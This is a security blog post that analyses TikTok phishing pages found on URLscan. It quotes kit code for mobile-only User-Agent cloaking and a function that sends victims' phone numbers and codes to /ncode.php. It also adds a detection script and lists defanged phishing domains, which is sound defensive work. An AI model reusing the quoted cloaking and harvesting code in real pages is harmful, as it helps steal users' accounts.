Taking a look at TikTok Phishing pages on URLscan

Published by Reza Rafati on

I was looking around on URLscan for TikTok phishing pages and noticed several pages that try to lure TikTok users. I want to share my findings with you so that you save some time and can do a quicker analysis.

Fake TikTok login form

The template used in the TikTok phishing attack is pretty simple. It uses a form with 3 fields: the victim is supposed to select the phone country code and enter their phone number, and a 4-digit security code is also requested.

Fake Login form trying to steal TikTok credentials

In the upper right corner of the TikTok phishing page, the cybercriminals have added hyperlinks that navigate to the official TikTok website.

Taking a look at the fake TikTok page source code

The page tries to hide itself from desktop users: it performs a check to see whether the visitor is using a mobile device.

It checks for:

  • Android
  • webOS
  • iPhone
  • iPad
  • iPod
  • BlackBerry
  • BB
  • PlayBook
  • IE Mobile
  • WindowsPhone
  • Kindle
  • Silk
  • Opera Mini
Mobile device check performed by User-Agent.

    // Case-insensitive regex of the mobile device identifiers the page looks for in the User-Agent
    const devices = new RegExp('Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|IEMobile|Windows Phone|Kindle|Silk|Opera Mini', "i");
    // Only visitors whose User-Agent matches one of them get the fake login form
    if (devices.test(navigator.userAgent)) {
        // ... body not included in the excerpt
    }

When we take a look at the code of the fake TikTok form, we quickly notice that the information is not being sent to an official TikTok server. Instead it is sent to a fraudulent site.

The information is sent to the path /ncode.php

    function sendcode() {
        // checknum() is not part of the excerpt; it validates the phone number and the entered code
        getstatus = checknum(document.getElementById('numer').innerHTML.split(' ')[1], document.getElementById('inputlog').value)
        if (getstatus){
            // The request goes to /ncode.php on the phishing host, not to a TikTok server;
            // [REMOVED] marks a value redacted by the author
            var x = new XMLHttpRequest();
            x.open('_GET', "#/ncode.php"+'?number='+document.getElementById('numer').innerHTML.split(' ')[1]+document.getElementById('inputlog').value+'&chatid='+[REMOVED]+'&status=getnumber')
            // The submit button is greyed out and disabled after the first click
            document.getElementById("sendcode").className = "login-button-31D24 line-ErmhG disable-fEJEn highlight-1TvcX";
            document.getElementById("sendcode").setAttribute('disabled', 'disable');
            // ... excerpt ends here
        }
    }
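The two behaviours described above, the User-Agent based mobile-only cloaking and the XMLHttpRequest that ships the phone number and code to /ncode.php on the phishing host, can be picked out of a page's inline script automatically. The following JavaScript is an added example for this post, not code from the phishing kit or from URLscan: it scans a constructed sample script modelled on the quoted snippets (using a plain 'GET' method, the path "/ncode.php" and a placeholder CHAT_ID, all assumptions of this example) and reports the device tokens the cloaking check looks for, plus every request target that is not on tiktok.com.

```javascript
// Added example for this post (not code from the phishing page or from URLscan):
// a small static triage helper that scans a page's inline JavaScript for the two
// behaviours discussed above: the User-Agent based mobile-only cloaking check and
// an XMLHttpRequest that sends the entered phone number and code to a path on the
// phishing host instead of a tiktok.com endpoint.
// SAMPLE_SOURCE is constructed to mimic the quoted snippets; it is not the
// verbatim page source, and CHAT_ID / showLoginForm are placeholders of this example.

const SAMPLE_SOURCE = `
const devices = new RegExp('Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|IEMobile|Windows Phone|Kindle|Silk|Opera Mini', "i");
if (devices.test(navigator.userAgent)) { showLoginForm(); }
function sendcode() {
  var x = new XMLHttpRequest();
  x.open('GET', "/ncode.php"+'?number='+document.getElementById('numer').innerHTML+'&chatid='+CHAT_ID+'&status=getnumber');
  x.send();
}
`;

// Returns true only for tiktok.com or one of its subdomains. A relative path
// (e.g. "/ncode.php") resolves to the host serving the page, so it is never official.
function isOfficialTikTok(target) {
  if (!/^https?:\/\//i.test(target)) return false;
  const host = new URL(target).hostname.toLowerCase();
  return host === 'tiktok.com' || host.endsWith('.tiktok.com');
}

// Detects a User-Agent sniffing check and extracts the device tokens it looks for.
function findUaCloaking(src) {
  if (!/navigator\.userAgent/.test(src)) return { found: false, tokens: [] };
  const m = src.match(/new RegExp\(\s*(['"])([^'"]+)\1/);
  return { found: true, tokens: m ? m[2].split('|') : [] };
}

// Finds every XMLHttpRequest open() call and records the HTTP method, the target
// given as a string literal, and the query parameter names appended to it.
function findXhrTargets(src) {
  const openRe = /\.open\(\s*(['"])([A-Za-z_]+)\1\s*,\s*(['"])([^'"]+)\3([^\n;]*)/g;
  const targets = [];
  for (const m of src.matchAll(openRe)) {
    const [, , method, , target, rest] = m;
    // Parameter names such as number, chatid, status from the concatenated query string
    const params = Array.from(rest.matchAll(/[?&](\w+)=/g), p => p[1]);
    targets.push({ method, target, params, official: isOfficialTikTok(target) });
  }
  return targets;
}

// Combines both checks into a triage summary: cloaking details, the non-TikTok
// request targets (candidate exfiltration endpoints) and an overall flag.
function triage(src) {
  const cloaking = findUaCloaking(src);
  const exfil = findXhrTargets(src).filter(t => !t.official);
  const suspicious = cloaking.found || exfil.length > 0;
  return { cloaking, exfil, suspicious };
}

console.log(JSON.stringify(triage(SAMPLE_SOURCE), null, 2));
```

Run it with node; to triage a real sample, replace SAMPLE_SOURCE with the inline script text saved from the scan. The User-Agent check also explains why such a page should be fetched with a mobile User-Agent when you want to see the form at all.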

Find them on URLscan:

Additional IOC

  • account-tiktok[.]rf[.]gd
  • tiktok-monetization[.]ru
  • tiktok-ticket[.]ru
  • tiktok-support[.]ga
  • www[.]tiktok-support[.]ga
  • support[.]pp[.]ru
  • log-in-tiktok[.]com
  • tiktok-business[.]ru
  • www[.]tiktoksupport[.]live
  • tiktok-monetezation[.]ru

Reza Rafati

Founder of Cyberwarzone.com.